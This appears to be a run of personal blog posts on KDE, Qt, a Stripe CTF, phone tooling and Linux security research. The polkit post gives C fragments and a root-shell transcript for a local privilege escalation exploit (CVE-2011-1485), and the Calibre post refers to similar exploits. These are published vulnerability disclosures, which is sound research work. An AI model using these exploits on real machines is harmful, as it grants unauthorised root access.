Stripe released a capture the flag, a security competition to exploit several contrived flaws. I solved all of them, and you can take a look at the solutions here. Here’s a video of a complete walkthrough:
I just moved to Paris, which means I’m finally in the right proximity at the right time for attending an open source conference. I’m not sure what the scoop is with the Parsian KDE community — if it exists or is vibrant, if there’s camaraderie, or what the situation is. But, in case there is a good vibe brewing inside the Paris OSS community, what do you say we all band together to attend FOSDEM. Leave our city for Brussels in a festive caravan on Friday night (or possibly just a train) and come back Sunday night? If there’s interest, email me at jason [at] zx2c4 dot com or leave a comment below.
TechRadar has decided that KDE is the most usable desktop compared to Gnome and Unity. A few days prior to the publication of this article, my friend John emailed me to write:
I’m using Kde on my computer at work and it is amazing. It’s improved so much that it’s now stable and highly usable.
I tried Unity (I’m using Ubuntu) and it was unusable. Gnome 3 was better but had massive issues with my second screen (dual screen setup with nvdia gpu running in twin view). Gnome 3 was still lacking in the productivity area though. Lxde worked great but I don’t want to use a desktop that looks and feels like Windows 95… Also Lxde has few apps so I had to pull in gnome or ode ones…
I also had issues with Ubuntu’s lightdm but switching to kdm fixed that. So far Kde is the only desktop that fully works, feels good, looks good and has apps for every task.
John
—
Sent from my phone
Finally folks are figuring out that KDE doesn’t suck anymore.
Update: Adam Weiss writes with a political comparison:
Gnome 3, Unity…they are like the George W. Bush of the non-KDE Linux desktop movement. Instead of taking care of the real issues on the desk, they went gallavanting off into the netbook world, dropping bombs all over the place and even to this day nobody can really figure out what the point of netbooks is…
A few weeks ago, I posted an exploit and a bug report for a Linux local root exploit in Calibre. The author, Kovid Goyal, became incensed, and rather than work with me to fix it, he insulted my colleagues and me. After each one of his fixes, I released a new exploit breaking the latest. It got a lot of social media hype, and was kind of a big deal. After several days of media frenzy and bad publicity, the stubborn developer finally bent to the advice of the chorus of leading security researchers, and the mount helper was removed in entirety. In any case, the exploits show some neat race condition tricks that you might want to check out, using inotify and a toggler.
There’s plenty of technical explanation in the comments of the code. I was assigned CVE-2011-4124, CVE-2011-4125, and CVE-2011-4126, my first three CVEs.
After that, I decided to learn about linker bugs, so I reread Tavis’ excellent two write-ups on CVE-2010-3856 and CVE-2010-3847. I saw that there was room for writing a newer exploit based on his research that did not depend on having read access to SUID executables or having a cron daemon installed, so I wrote I Can’t Read and I Won’t Race You Either. The source has plenty of explanation. I also suggest reading Tim Brown’s excellent paper on linker bugs.
So far as I can tell, changing your wallpaper (using the default wallpaper plugin, not any fancy scripted wallpaper plugins) from the command line in KDE4 is needlessly hard. I have to write a JavaScript file to a temporary location, make a dbus call to load it into an interactive window, and then use xdotool to simulate key strokes to run it. Jimminy cricket. But below is how I have it done. If there’s an easier way that I’ve missed, pleeeaassseee let me know in the comments.
set-wallpaper.sh:
#!/bin/sh js=$(mktemp) cat > $js <<_EOF var wallpaper = "$1"; var activity = activities()[0]; activity.currentConfigGroup = new Array("Wallpaper", "image"); activity.writeConfig("wallpaper", wallpaper); activity.writeConfig("userswallpaper", wallpaper); activity.reloadConfig(); _EOF qdbus org.kde.plasma-desktop /App local.PlasmaApp.loadScriptInInteractiveConsole "$js" > /dev/null xdotool search --name "Desktop Shell Scripting Console – Plasma Desktop Shell" windowactivate key ctrl+e key ctrl+w rm -f "$js"
Since it’s been 6 months since reported, I figure it’s been a responsible amount of time for me to wait before releasing a local root exploit for Linux that targets polkit-1 <= 0.101, CVE-2011-1485, a race condition in PolicyKit. I present you with PolicyKit Pwnage.
David Zeuthen of Redhat explains on the original bug report:
Briefly, the problem is that the UID for the parent process of pkexec(1) is read from /proc by stat(2)’ing /proc/PID. The problem with this is that this returns the effective uid of the process which can easily be set to 0 by invoking a setuid-root binary such as /usr/bin/chsh in the parent process of pkexec(1). Instead we are really interested in the real-user-id. While there’s a check in pkexec.c to avoid this problem (by comparing it to what we expect the uid to be – namely that of the pkexec.c process itself which is the uid of the parent process at pkexec-spawn-time), there is still a short window where an attacker can fool pkexec/polkitd into thinking that the parent process has uid 0 and is therefore authorized. It’s pretty hard to hit this window – I actually don’t know if it can be made to work in practice.
Well, here is, in fact, how it’s made to work in practice. There is as he said an attempted mitigation, and the way to trigger that mitigation path is something like this:
$ sudo -u `whoami` pkexec sh User of caller (0) does not match our uid (1000)
Not what we want. So the trick is to execl to a suid at just the precise moment /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed, and execl to the suid binary as our very next instruction.
if (fork()) { int fd; char pid_path[1024]; sprintf(pid_path, "/proc/%i", getpid()); printf("[+] Configuring inotify for proper pid.\n"); close(0); close(1); close(2); fd = inotify_init(); if (fd < 0) perror("[-] inotify_init"); inotify_add_watch(fd, pid_path, IN_ACCESS); read(fd, NULL, 0);
All the code up to this point makes this process block until /proc/PID is read, at which point it:
execl("/usr/bin/chsh", "chsh", NULL);
Which is suid. Meanwhile in the other process, we launch pkexec, which skirts passed the initial checks, but gets fooled when we change the uid of the parent process:
} else { sleep(1); printf("[+] Launching pkexec.\n"); execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL); }
And it works:
$ pkexec --version pkexec version 0.101 $ gcc polkit-pwnage.c -o pwnit $ ./pwnit [+] Configuring inotify for proper pid. [+] Launching pkexec. sh-4.2# whoami root sh-4.2# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm) sh-4.2#
This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which as of writing uses 0.101, has backported 0.102's bug fix. A way to check this is by looking at the mtime of /usr/bin/pkexec -- April 19, 2011 or later and you're out of luck. It's likely other distributions do the same. Fortunately, this exploit is clean enough that you can try it out without too much collateral.
So head on over and try it out! You can watch it in action over on YouTube as well:
Greets to Dan.
The vcard export GUI feature of the contacts app on the N950 is broken. The console app “vcardconverter” successfully digests vcards, but you won’t be able to get them out. In my case, it converted some back to vcards, but failed on others. Unacceptable. For updating to today’s new firmware, I didn’t want to take a full backup of the tracker database, choosing instead to start fresh, suspecting that the new firmware fixes a lot of bugs. How, then, was I to backup my contacts, if I wasn’t going to backup the tracker? Vcard is the perfect neutral format for this.
So in a few lines of easy Qt/C++, I wrote vcardexport, a console application. It spits all the contacts out into one giant vcard file that can be reimported later with vcardconverter. Simple and easy. The biggest pain was getting the Aegis manifest correct, as the auto-generation tool is broken, and documentation is kind of sparse, but it’s all sorted now.
You can browse the source here or download the latest deb from here.
Usage:
$ /opt/vcardexport/bin/vcardexport > ~/vcards.vcf
Hope this is helpful. Enjoy the new firmware:
image [state progress transfer flash speed]
---------------------------------------------------------------------
[x] cert-sw [finished 100 % 1 / 1 kB NA ]
[x] cmt-2nd [finished 100 % 95 / 95 kB NA ]
[x] cmt-algo [finished 100 % 789 / 789 kB NA ]
[x] cmt-mcusw [finished 100 % 6008 / 6008 kB 2933 kB/s]
[x] xloader [finished 100 % 23 / 23 kB NA ]
[x] secondary [finished 100 % 88 / 88 kB NA ]
[x] kernel [finished 100 % 2708 / 2708 kB 2024 kB/s]
[x] rootfs [finished 100 % 326205 / 326205 kB 7339 kB/s]
[x] mmc [finished 100 % 204747 / 204747 kB 17604 kB/s]
Updating SW release
Success
Back in February I gave a workshop seminar on the basics of Qt — covering signals, slots, the metaobject system, QtGui, QtWebkit, and Qt Creator. We all built a fully functional web browser together, over the course of about an hour. The entirety was spoken just off the top of my head, so it might be slightly disorganized, but there was pretty high reception from it. I know that following the presentation, at least two people went on to use Qt for major projects. Here’s the presentation:
Direct YouTube Link
Unfortunately, the projector in the room was broken, so we all had to huddle around my laptop, which actually had the effect of making the workshop much more intimate. If you’re interested, here’s the code we wrote together.
The Nokia E52 is the most awesome phone ever made. It has a normal T9 keypad, GPS, 3G, Wifi, and runs Symbian. These are the features I need. Sure Android and others are more modern operating systems, but there is no smartphone OS that has phones with T9 hardware keypads of this form factor, except for the E52. There is one problem: it’s not made anymore
There are two models of the E52 — the E52-1, which has European 3G frequencies, and the E52-2, which has North American 3G frequencies. I’m looking for the E52-2.
If anyone knows there whereabouts of an E52-2, please inform me. I will bid high.